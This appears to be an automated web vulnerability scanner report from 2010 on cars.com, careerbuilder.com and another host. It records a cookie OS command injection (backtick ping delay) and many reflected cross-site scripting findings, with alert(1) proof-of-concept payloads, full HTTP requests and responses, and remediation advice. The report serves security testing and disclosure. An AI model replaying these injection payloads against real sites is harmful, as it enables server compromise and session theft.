The Registration cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload `ping%20-c%2020%20127.0.0.1` was submitted in the Registration cookie. The application took 47237 milliseconds to respond to the request, compared with 1819 milliseconds for the original request, indicating that the injected command caused a time delay.
Issue background
Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to execute commands other than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:
The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defense can mitigate the impact of an attack even in the event that an attacker circumvents the input validation defenses.
Request
GET /go/advice/Story.jsp?section=safe&story=crashRatings&subject=crash&aff=herald HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=`ping%20-c%2020%20127.0.0.1`; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the i request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8a0f'-alert(1)-'3c4a4687659 was submitted in the i parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1&i=2834c0d2aa8a0f'-alert(1)-'3c4a4687659 HTTP/1.1
Host: 66.70.86.62
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 00:21:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 609
The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acaf4'-alert(1)-'7eba7def320 was submitted in the k parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1acaf4'-alert(1)-'7eba7def320&i=2834c0d2a HTTP/1.1
Host: 66.70.86.62
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 00:21:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 609
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd277\"%3balert(1)//95814bce789 was submitted in the REST URL parameter 1. This input was echoed as fd277\\";alert(1)//95814bce789 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2848b\"%3balert(1)//7913391f575 was submitted in the REST URL parameter 2. This input was echoed as 2848b\\";alert(1)//7913391f575 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
2.5. http://acc.cars.com/jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94d74\"%3balert(1)//bb209c18b07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94d74\\";alert(1)//bb209c18b07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 916f0\"%3balert(1)//f22c0a0d6c2 was submitted in the REST URL parameter 1. This input was echoed as 916f0\\";alert(1)//f22c0a0d6c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jserver916f0\"%3balert(1)//f22c0a0d6c2/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;
Response
HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 02:43:47 GMT
X-DirectServer: cvcars_DS0
Content-Type: application/x-javascript
Content-Length: 373
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d38f\"%3balert(1)//1539b4dcad0 was submitted in the REST URL parameter 2. This input was echoed as 1d38f\\";alert(1)//1539b4dcad0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jserver/acc_random1d38f\"%3balert(1)//1539b4dcad0=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;
Response
HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:18 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 373
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
2.8. http://acc.cars.com/jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0836\"%3balert(1)//e13954b58bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0836\\";alert(1)//e13954b58bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261?a0836\"%3balert(1)//e13954b58bb=1 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;
Response
HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:14 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 376
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0050\"%3balert(1)//7ed6d85a66a was submitted in the REST URL parameter 1. This input was echoed as c0050\\";alert(1)//7ed6d85a66a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jserverc0050\"%3balert(1)//7ed6d85a66a/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;
Response
HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:17 GMT
X-DirectServer: cvcars_DS3
Content-Type: application/x-javascript
Content-Length: 609
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40578\"%3balert(1)//3b419f8cdbf was submitted in the REST URL parameter 2. This input was echoed as 40578\\";alert(1)//3b419f8cdbf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jserver/acc_random40578\"%3balert(1)//3b419f8cdbf=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;
Response
HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:19 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 609
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
2.11. http://acc.cars.com/jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71a4e\"%3balert(1)//11eb5132b70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71a4e\\";alert(1)//11eb5132b70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261?71a4e\"%3balert(1)//11eb5132b70=1 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;
Response
HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 02:43:46 GMT
X-DirectServer: cvcars_DS0
Content-Type: application/x-javascript
Content-Length: 612
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e45a\"%3balert(1)//cb7a68796a2 was submitted in the REST URL parameter 1. This input was echoed as 3e45a\\";alert(1)//cb7a68796a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3eec\"%3balert(1)//f976d163c71 was submitted in the REST URL parameter 2. This input was echoed as d3eec\\";alert(1)//f976d163c71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
2.14. http://acc.cars.com/jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f4a5\"%3balert(1)//96265a28453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7f4a5\\";alert(1)//96265a28453 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51115"%20a%3db%20d5b4f13e8c1 was submitted in the lr parameter. This input was echoed as 51115" a=b d5b4f13e8c1 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?lr=cbcb_mhf48aa51115"%20a%3db%20d5b4f13e8c1 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 235413
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR35
Date: Sun, 14 Nov 2010 23:28:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 270f0"%20a%3db%20e3d0cbef4fe was submitted in the lr parameter. This input was echoed as 270f0" a=b e3d0cbef4fe in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ag.ic/Florida/?lr=cbcb_mhf48aa270f0"%20a%3db%20e3d0cbef4fe HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 195258
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR10
Date: Sun, 14 Nov 2010 23:08:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53581'-alert(1)-'707915ba59b was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ag.ic/Florida/?lr=cbcb_mhf48aa53581'-alert(1)-'707915ba59b HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196172
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR35
Date: Sun, 14 Nov 2010 23:12:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Florid ...[SNIP]... ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa53581'-alert(1)-'707915ba59b&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cca06'%3b229e8665375 was submitted in the REST URL parameter 2. This input was echoed as cca06';229e8665375 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
